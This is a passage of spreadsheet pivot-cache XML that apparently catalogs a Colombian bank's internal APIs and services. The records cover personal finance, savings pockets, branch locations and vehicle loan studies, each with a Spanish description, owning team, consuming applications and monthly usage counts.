    <n v="43"/>
    <n v="112"/>
    <n v="1165"/>
    <n v="2296"/>
    <n v="3012"/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-03-18T20:29:09"/>
    <s v="Payroll Management"/>
    <n v="124"/>
    <s v="Payroll Management - Subscription payment management"/>
    <n v="102"/>
    <x v="342"/>
    <s v="API que permite la gestión del pago de la suscripción de las empresas que utilizan el producto de gestion nomina. Inicialmente se expone endpoint para enviar la cuenta desde la cual se realizará el debito automatico para el pago."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Transversales no iSeries"/>
    <x v="3"/>
    <s v="Productor Transversal"/>
    <s v="Los Federales"/>
    <s v="Ruben Dario Cardenas"/>
    <m/>
    <s v="nomina app"/>
    <s v="EDPYME_AW1170 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <m/>
    <m/>
    <n v="872"/>
    <n v="1440"/>
    <n v="2298"/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-08-22T17:21:53"/>
    <s v="Tec- Personal Finance"/>
    <n v="132"/>
    <s v="Personal finance  Admin - Management"/>
    <n v="120"/>
    <x v="343"/>
    <s v="Esta API está orientada al manejo de las FINANZAS PERSONALES de los clientes del banco. Específicamente al manejo de sus gastos. Podremos gestionar a través de las operaciones incluidas en esta API las herramientas necesarias para poder conocer dichos gastos en un periodo de fechas, históricos de estos gastos y el detalle de ellos, teniendo dicha información agrupada y asociadas a unas categorías de gastos. Esto con el fin de obtener un panorama completo de las FINANZAS PERSONALES del cliente. "/>
    <s v="ECOSISTEMAS"/>
    <s v="Ecosistemas"/>
    <x v="25"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="MascaraTransaccional_NU0021001 _x000d__x000a_ CapaGestionCanal_NU0014001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-04-26T14:38:30"/>
    <s v="Personal Finance"/>
    <n v="110"/>
    <s v="Personal Finance - Admin Management"/>
    <n v="210"/>
    <x v="343"/>
    <s v="No tiene Descipcion"/>
    <s v="ECOSISTEMAS"/>
    <s v="Ecosistemas"/>
    <x v="25"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="Tabot_AW1165001 _x000d__x000a_ CGC_NU0014001 _x000d__x000a_ Tabot_AW1165001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ APP-PERSONAS_NU0146001"/>
    <m/>
    <n v="1"/>
    <n v="1"/>
    <n v="3"/>
    <n v="2"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-02-10T19:06:17"/>
    <s v="Personal Finance"/>
    <n v="230"/>
    <s v="Personal Finance - Admin Management"/>
    <n v="243"/>
    <x v="343"/>
    <s v="Esta API está orientada al seguimiento administrativo del módulo de FINANZAS PERSONALES de los clientes del banco. Permitiendo controlar y tener registro de todas las actividades realizadas por los clientes en los distintos módulos."/>
    <s v="ECOSISTEMAS"/>
    <s v="Ecosistemas"/>
    <x v="25"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <n v="1"/>
    <n v="1"/>
    <n v="3"/>
    <n v="2"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-02-10T19:06:17"/>
    <s v="Personal Finance"/>
    <n v="110"/>
    <s v="Personal Finance - Budget"/>
    <n v="100"/>
    <x v="344"/>
    <s v="Esta API está orientada al manejo de las FINANZAS PERSONALES de los clientes del banco. Especí­ficamente al manejo de su presupuesto. Podremos gestionar a través de las operaciones incluidas en esta API las herramientas necesarias para poder guardar el presupuesto de gastos, ingresos y ahorros de un mes y un periodo de tiempo que determine. A este presupuesto mes a mes, o segíºn se desee, puede ser modificado, y ajustar segíºn los planes financieros de cada cliente."/>
    <s v="ECOSISTEMAS"/>
    <s v="Ecosistemas"/>
    <x v="25"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="Tabot_AW1165001 _x000d__x000a_ CGC_NU0014001 _x000d__x000a_ Tabot_AW1165001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ APP-PERSONAS_NU0146001"/>
    <m/>
    <n v="125"/>
    <n v="363"/>
    <n v="350"/>
    <n v="2534"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-04-26T14:38:30"/>
    <s v="Personal Finance"/>
    <n v="230"/>
    <s v="Personal Finance - Budget"/>
    <n v="203"/>
    <x v="344"/>
    <s v="Esta API está orientada al manejo de las FINANZAS PERSONALES de los clientes del banco. Especí­ficamente al manejo de su presupuesto. Podremos gestionar a través de las operaciones incluidas en esta API las herramientas necesarias para poder guardar el presupuesto de gastos, ingresos y ahorros de un mes y un periodo de tiempo que determine. A este presupuesto mes a mes, o segíºn se desee, puede ser modificado, y ajustar segíºn los planes financieros de cada cliente."/>
    <s v="ECOSISTEMAS"/>
    <s v="Ecosistemas"/>
    <x v="25"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <n v="125"/>
    <n v="363"/>
    <n v="350"/>
    <n v="2534"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-08-22T17:21:53"/>
    <s v="Tec- Personal Finance"/>
    <n v="132"/>
    <s v="Personal finance  Cash - Management"/>
    <n v="110"/>
    <x v="345"/>
    <s v="Esta API está orientada al manejo de las FINANZAS PERSONALES de los clientes del banco. Específicamente al manejo de sus gastos. Podremos gestionar a través de las operaciones incluidas en esta API las herramientas necesarias para poder conocer dichos gastos en un periodo de fechas, históricos de estos gastos y el detalle de ellos, teniendo dicha información agrupada y asociadas a unas categorías de gastos. Esto con el fin de obtener un panorama completo de las FINANZAS PERSONALES del cliente. "/>
    <s v="ECOSISTEMAS"/>
    <s v="Ecosistemas"/>
    <x v="25"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="MascaraTransaccional_NU0021001 _x000d__x000a_ CapaGestionCanal_NU0014001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-02-10T19:06:17"/>
    <s v="Personal Finance"/>
    <n v="110"/>
    <s v="Personal Finance - Cash Management"/>
    <n v="200"/>
    <x v="345"/>
    <s v="Esta API está orientada al manejo de las FINANZAS PERSONALES de los clientes del banco. Especí­ficamente al manejo de su efectivo. Podremos gestionar a través de las operaciones incluidas en esta API las herramientas necesarias para tener registro de los movimientos de efectivo que haga el cliente, tales como: creación, actualización y modificación de las transacciones en efectivo. Esto con el fin de obtener un panorama completo de las FINANZAS PERSONALES del cliente."/>
    <s v="ECOSISTEMAS"/>
    <s v="Ecosistemas"/>
    <x v="25"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="Tabot_AW1165001 _x000d__x000a_ CGC_NU0014001 _x000d__x000a_ Tabot_AW1165001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ APP-PERSONAS_NU0146001"/>
    <n v="10475"/>
    <n v="10354"/>
    <n v="10126"/>
    <n v="12820"/>
    <n v="11459"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-04-26T14:38:30"/>
    <s v="Personal Finance"/>
    <n v="230"/>
    <s v="Personal Finance - Cash Management"/>
    <n v="214"/>
    <x v="345"/>
    <s v="No tiene Descipcion"/>
    <s v="ECOSISTEMAS"/>
    <s v="Ecosistemas"/>
    <x v="25"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <n v="10475"/>
    <n v="10354"/>
    <n v="10126"/>
    <n v="12820"/>
    <n v="11459"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-08-22T17:21:53"/>
    <s v="Tec- Personal Finance"/>
    <n v="132"/>
    <s v="Personal finance  CreditCard - Management"/>
    <n v="110"/>
    <x v="346"/>
    <s v="Esta API está orientada al manejo de las FINANZAS PERSONALES de los clientes del banco. Específicamente al manejo de sus gastos, realizados a través de su(s) tarjetas de crédito. Podremos gestionar a través de las operaciones incluidas en esta API las herramientas necesarias para poder conocer dichos gastos en un periodo de fechas, históricos de estos gastos y el detalle de ellos, teniendo dicha información agrupada y asociadas a unas categorías de gastos. Esto con el fin de obtener un panorama completo de las FINANZAS PERSONALES del cliente."/>
    <s v="ECOSISTEMAS"/>
    <s v="Ecosistemas"/>
    <x v="25"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="MascaraTransaccional_NU0021001 _x000d__x000a_ CapaGestionCanal_NU0014001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-02-10T19:06:17"/>
    <s v="Personal Finance"/>
    <n v="230"/>
    <s v="Personal Finance - CreditCard Management"/>
    <n v="114"/>
    <x v="346"/>
    <s v="Esta API está orientada al manejo de las FINANZAS PERSONALES de los clientes del banco. Especí­ficamente al manejo de sus gastos, realizados a través de su(s) tarjetas de crédito. Podremos gestionar a través de las operaciones incluidas en esta API las herramientas necesarias para poder conocer dichos gastos en un periodo de fechas, históricos de estos gastos y el detalle de ellos, teniendo dicha información agrupada y asociadas a unas categorí­as de gastos. Esto con el fin de obtener un panorama completo de las FINANZAS PERSONALES del cliente."/>
    <s v="ECOSISTEMAS"/>
    <s v="Ecosistemas"/>
    <x v="25"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="Tabot_AW1165001 _x000d__x000a_ CGC_NU0014001 _x000d__x000a_ Tabot_AW1165001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ APP-PERSONAS_NU0146001"/>
    <n v="118412"/>
    <n v="101479"/>
    <n v="96317"/>
    <n v="118536"/>
    <n v="109208"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-08-22T17:21:53"/>
    <s v="Tec- Personal Finance"/>
    <n v="132"/>
    <s v="Personal finance  Expenses - Management"/>
    <n v="110"/>
    <x v="347"/>
    <s v="Esta API está orientada al manejo de las FINANZAS PERSONALES de los clientes del banco. Específicamente al manejo de sus gastos. Podremos gestionar a través de las operaciones incluidas en esta API las herramientas necesarias para poder conocer dichos gastos en un periodo de fechas, históricos de estos gastos y el detalle de ellos, teniendo dicha información agrupada y asociadas a unas categorías de gastos. Esto con el fin de obtener un panorama completo de las FINANZAS PERSONALES del cliente. "/>
    <s v="ECOSISTEMAS"/>
    <s v="Ecosistemas"/>
    <x v="25"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="MascaraTransaccional_NU0021001 _x000d__x000a_ CapaGestionCanal_NU0014001"/>
    <n v="268"/>
    <n v="513"/>
    <n v="5470"/>
    <m/>
    <m/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-02-10T19:06:17"/>
    <s v="Personal Finance"/>
    <n v="230"/>
    <s v="Personal Finance - Expenses Management"/>
    <n v="114"/>
    <x v="347"/>
    <s v="Esta API está orientada al manejo de las FINANZAS PERSONALES de los clientes del banco. Especí­ficamente al manejo de sus gastos. Podremos gestionar a través de las operaciones incluidas en esta API las herramientas necesarias para poder conocer dichos gastos en un periodo de fechas, históricos de estos gastos y el detalle de ellos, teniendo dicha información agrupada y asociadas a unas categorí­as de gastos. Esto con el fin de obtener un panorama completo de las FINANZAS PERSONALES del cliente."/>
    <s v="ECOSISTEMAS"/>
    <s v="Ecosistemas"/>
    <x v="25"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="Tabot_AW1165001 _x000d__x000a_ CGC_NU0014001 _x000d__x000a_ Tabot_AW1165001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ APP-PERSONAS_NU0146001"/>
    <n v="783386"/>
    <n v="694063"/>
    <n v="680729"/>
    <n v="948563"/>
    <n v="893550"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-08-22T17:21:53"/>
    <s v="Tec- Personal Finance"/>
    <n v="132"/>
    <s v="Personal finance  Incomes - Management"/>
    <n v="110"/>
    <x v="348"/>
    <s v="Esta API está orientada al manejo de las FINANZAS PERSONALES de los clientes del banco. Específicamente al manejo de su efectivo. Podremos gestionar a través de las operaciones incluidas en esta API las herramientas necesarias para tener registro de los movimientos de efectivo que haga el cliente, tales como: creación, actualización y modificación de las transacciones en efectivo. Esto con el fin de obtener un panorama completo de las FINANZAS PERSONALES del cliente."/>
    <s v="ECOSISTEMAS"/>
    <s v="Ecosistemas"/>
    <x v="25"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="MascaraTransaccional_NU0021001 _x000d__x000a_ CapaGestionCanal_NU0014001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-02-10T19:06:17"/>
    <s v="Personal Finance"/>
    <n v="230"/>
    <s v="Personal Finance - Incomes Management"/>
    <n v="114"/>
    <x v="348"/>
    <s v="Esta API está orientada al manejo de las FINANZAS PERSONALES de los clientes del banco. Especí­ficamente al manejo de su efectivo. Podremos gestionar a través de las operaciones incluidas en esta API las herramientas necesarias para tener registro de los movimientos de efectivo que haga el cliente, tales como: creación, actualización y modificación de las transacciones en efectivo. Esto con el fin de obtener un panorama completo de las FINANZAS PERSONALES del cliente."/>
    <s v="ECOSISTEMAS"/>
    <s v="Ecosistemas"/>
    <x v="25"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="Tabot_AW1165001 _x000d__x000a_ CGC_NU0014001 _x000d__x000a_ Tabot_AW1165001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ APP-PERSONAS_NU0146001"/>
    <n v="239214"/>
    <n v="214363"/>
    <n v="207885"/>
    <n v="251192"/>
    <n v="235245"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-02-10T19:06:17"/>
    <s v="Personal Finance"/>
    <n v="230"/>
    <s v="Personal Finance - Reports"/>
    <n v="103"/>
    <x v="349"/>
    <s v="Esta API está orientada a la reporteria general de las finanzas personales. Permitiendo consultas valores generales, como el estado actual de las finanzas: total de gastos, total de ingresos, total de gastos con tarjetas de crédito, entre otros."/>
    <s v="ECOSISTEMAS"/>
    <s v="Ecosistemas"/>
    <x v="25"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="Tabot_AW1165001 _x000d__x000a_ CGC_NU0014001 _x000d__x000a_ Tabot_AW1165001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ APP-PERSONAS_NU0146001"/>
    <m/>
    <m/>
    <m/>
    <n v="8"/>
    <n v="954"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-08-22T17:21:53"/>
    <s v="Tec- Personal Finance"/>
    <n v="132"/>
    <s v="Personal finance  Terms"/>
    <n v="110"/>
    <x v="350"/>
    <s v="Esta API está orientada a la administración de los términos y condiciones que rige al módulo de finanzas personales. Controlando la versión actual y el histórico de versiones que tiene el módulo.   _x000a__x000a_De igual manera, se puede hacer registro y la consulta de los clientes que han aceptado los términos y condiciones para el uso de las finanzas personales en los distintos canales del banco. "/>
    <s v="ECOSISTEMAS"/>
    <s v="Ecosistemas"/>
    <x v="25"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="MascaraTransaccional_NU0021001 _x000d__x000a_ CapaGestionCanal_NU0014001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-02-10T19:06:17"/>
    <s v="Personal Finance"/>
    <n v="110"/>
    <s v="Personal Finance - Terms"/>
    <n v="200"/>
    <x v="350"/>
    <s v="Esta API está orientada a la administración de los términos y condiciones que rige al módulo de finanzas personales. Controlando la versión actual y el histórico de versiones que tiene el módulo.  De igual manera, se puede hacer registro y la consulta de los clientes que han aceptado los términos y condiciones para el uso de las finanzas personales en los distintos canales del banco."/>
    <s v="ECOSISTEMAS"/>
    <s v="Ecosistemas"/>
    <x v="25"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="Tabot_AW1165001 _x000d__x000a_ CGC_NU0014001 _x000d__x000a_ Tabot_AW1165001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ APP-PERSONAS_NU0146001"/>
    <n v="550386"/>
    <n v="481375"/>
    <n v="456168"/>
    <n v="552002"/>
    <n v="548885"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-04-26T14:38:30"/>
    <s v="Personal Finance"/>
    <n v="230"/>
    <s v="Personal Finance - Terms"/>
    <n v="214"/>
    <x v="350"/>
    <s v="No tiene Descipcion"/>
    <s v="ECOSISTEMAS"/>
    <s v="Ecosistemas"/>
    <x v="25"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <n v="550386"/>
    <n v="481375"/>
    <n v="456168"/>
    <n v="552002"/>
    <n v="548885"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <m/>
    <m/>
    <s v="PG_IC_GESTIONCODIGOAUTORIZACION_GCU"/>
    <m/>
    <x v="300"/>
    <s v="Multi Protocol Gateway"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <x v="22"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="FUA-Front Unico de Autenticación_AW1291001, Servicio genérico de autenticación _AW1160001"/>
    <s v="CLR (CLARO)_x000a_TLP (Teleperformance)_x000a_KNT (KONECTA)_x000a_BOT (TABOOT BANCOLOMBIA)"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio MDP"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-10-12T14:06:43"/>
    <s v="Physical Point Network"/>
    <n v="100"/>
    <s v="Physical Point Network - Service Points"/>
    <n v="100"/>
    <x v="351"/>
    <s v="La API Service points tiene el objetivo de consultar los puntos fí­sicos de Bancolombia, como lo son sucursales,  corresponsales bancarios y cajeros electrónicos.    La consulta a los puntos fí­sicos se debe hacer por la latitud, longitud y radio del cliente ya sea de su ubicación en tiempo real o de la ubicación que el desee; con esto podemos obtener información de ubicación y que servicios prestan cada uno de los puntos./ "/>
    <s v="CANALES_TRADICIONALES"/>
    <s v="Sucursales"/>
    <x v="16"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="ALM_AW0955001"/>
    <m/>
    <n v="385"/>
    <n v="64217"/>
    <n v="21887"/>
    <n v="29389"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-02-18T16:43:56"/>
    <s v="Physical Point Network"/>
    <n v="110"/>
    <s v="Physical Point Network - Service Points"/>
    <n v="110"/>
    <x v="351"/>
    <s v="La API Service points tiene el objetivo de consultar los puntos fí­sicos de Bancolombia, como lo son sucursales,  corresponsales bancarios y cajeros electrónicos.    La consulta a los puntos fí­sicos se debe hacer por la latitud, longitud y radio del cliente ya sea de su ubicación en tiempo real o de la ubicación que el desee; con esto podemos obtener información de ubicación y que servicios prestan cada uno de los puntos./ "/>
    <s v="CANALES_TRADICIONALES"/>
    <s v="Sucursales"/>
    <x v="16"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="ALM_AW0955001"/>
    <m/>
    <n v="385"/>
    <n v="64217"/>
    <n v="21887"/>
    <n v="29389"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-01-18T17:31:37"/>
    <s v="Pockets"/>
    <n v="141"/>
    <s v="Pocket - Information"/>
    <n v="113"/>
    <x v="352"/>
    <s v="Habilita las capacidades de consulta de bolsillos como listar las diferentes categorí­as por las cuales se puede separar el dinero, consultar los bolsillos de una cuenta en especí­fico, consultar el detalle de un bolsillo."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <s v="ConsultaInformacionBolsillos/V1.0"/>
    <m/>
    <s v="APP_PRODUCTORCONSUMIDOR _x000d__x000a_ PRODUCTORCONSUMIDOR_PRODUCTORCONSUMIDOR _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ BC_Monitoreo_ProductorConsumidor_Depositos _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ CGC_NU0014001 _x000d__x000a_ APP-PERSONAS_NU0146001"/>
    <n v="3210"/>
    <n v="3236"/>
    <n v="2718"/>
    <n v="2532"/>
    <n v="3876"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-01-18T17:31:37"/>
    <s v="Pockets"/>
    <n v="141"/>
    <s v="Pocket - Management"/>
    <n v="122"/>
    <x v="353"/>
    <s v="Habilita las capacidades de gestión sobre los bolsillos de una cuenta de ahorro, como su creación o cancelación, por ejemplo."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <s v="GestionDeBolsillos/V1.0"/>
    <m/>
    <s v="APP_PRODUCTORCONSUMIDOR _x000d__x000a_ PRODUCTORCONSUMIDOR_PRODUCTORCONSUMIDOR _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ BC_Monitoreo_ProductorConsumidor_Depositos _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ CGC_NU0014001 _x000d__x000a_ APP-PERSONAS_NU0146001"/>
    <n v="2978"/>
    <n v="2782"/>
    <n v="2424"/>
    <n v="2131"/>
    <n v="3483"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-01-18T17:31:37"/>
    <s v="Pockets"/>
    <n v="141"/>
    <s v="Pocket - Transactions"/>
    <n v="102"/>
    <x v="354"/>
    <s v="Habilita las capacidades de consulta relacionada con los movimientos que puede tener un bolsillo en particular, por ejemplo, adiciones, retiros o transferencias."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <s v="ConsultaMovimientosBolsillos/V1.0"/>
    <m/>
    <s v="APP_PRODUCTORCONSUMIDOR _x000d__x000a_ PRODUCTORCONSUMIDOR_PRODUCTORCONSUMIDOR _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ BC_Monitoreo_ProductorConsumidor_Depositos _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ CGC_NU0014001 _x000d__x000a_ APP-PERSONAS_NU0146001"/>
    <n v="2979"/>
    <n v="2785"/>
    <n v="2309"/>
    <n v="2117"/>
    <n v="3438"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2022-01-18T17:31:37"/>
    <s v="Pockets"/>
    <n v="141"/>
    <s v="Pocket - Transfers"/>
    <n v="102"/>
    <x v="355"/>
    <s v="Habilita las capacidades monetarias, como abonos, retiros y transferencias a los bolsillos de una cuenta."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <s v="TransferenciasDeBolsillos/V1.0"/>
    <m/>
    <s v="APP_PRODUCTORCONSUMIDOR _x000d__x000a_ PRODUCTORCONSUMIDOR_PRODUCTORCONSUMIDOR _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ BC_Monitoreo_ProductorConsumidor_Depositos _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ CGC_NU0014001 _x000d__x000a_ APP-PERSONAS_NU0146001"/>
    <n v="5"/>
    <m/>
    <m/>
    <n v="5"/>
    <n v="2"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-08-27T14:30:30"/>
    <s v="Point Of Services"/>
    <n v="100"/>
    <s v="Point Of Services - Shift Information"/>
    <n v="100"/>
    <x v="356"/>
    <s v="La API shift information tiene el objetivo de entregar información para las siguientes consultas  Consultar el identificador de un cliente y no cliente banco Consultar los servicios que prestan las sucursales "/>
    <s v="CANALES_TRADICIONALES"/>
    <s v="Sucursales"/>
    <x v="16"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Predictor Ingresos"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El objetivo del servicio es consultar los datos de los 6 últimos meses de los ingresos del cliente, producto de su nómina y/o pensión recibida en cuentas de depósitos de Bancolombia para ser procesada en solicitudes de crédito de vivienda. "/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Pagos y Recaudos"/>
    <m/>
    <m/>
    <s v="Pagos automáticos Bancolombia - PAB_ISPAB0001"/>
    <s v="AW0922 _x000d__x000a_AW0856"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="API IBM Cloud "/>
    <d v="2020-05-20T11:09:59"/>
    <s v="Loans Study Vehicle"/>
    <n v="101"/>
    <s v="Preliminary Study"/>
    <n v="101"/>
    <x v="357"/>
    <s v="El proceso de Estudio Preliminar, permite el registro de la información de los datos básicos del cliente, actividad económica, datos del vehí­culo y datos propios del comercio para realizar la ejecución del estudio preliminar para el crédito de véhiculo y obtener una aprobación parcial y permitir continuar con el proceso final del estudio."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <x v="11"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="VentasDigitalesSufi_NU0037 _x000d__x000a_ MovilidadCore_AW1281002"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="API TEC"/>
  </r>
  <r>
    <s v="API ONPREMISE"/>
    <d v="2021-04-06T02:22:21"/>
    <s v="Loans Study Vehicle"/>
    <n v="105"/>
    <s v="Preliminary Study"/>
    <n v="105"/>
    <x v="357"/>
    <s v="El proceso de Estudio Preliminar, permite el registro de la información de los datos básicos del cliente, actividad económica, datos del vehí­culo y datos propios del comercio para realizar la ejecución del estudio preliminar para el crédito de véhiculo y obtener una aprobación parcial y permitir continuar con el proceso final del estudio."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <x v="11"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="MonitoreoDCM_NU0084001 _x000d__x000a_ VentasDigitalesSufiVehiculos_AW1097001 _x000d__x000a_ MovilidadCore_AW1281002"/>
    <n v="40933"/>
    <n v="42088"/>
    <n v="35909"/>
    <n v="36716"/>
    <n v="47279"/>
    <s v="API ONPMS INT"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Procesamiento Archivos Depositos"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio permite notificar a depósitos que se le envió un archivo para que lo procese. "/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="2"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Leidy Yurany Guarin Lopez"/>
    <m/>
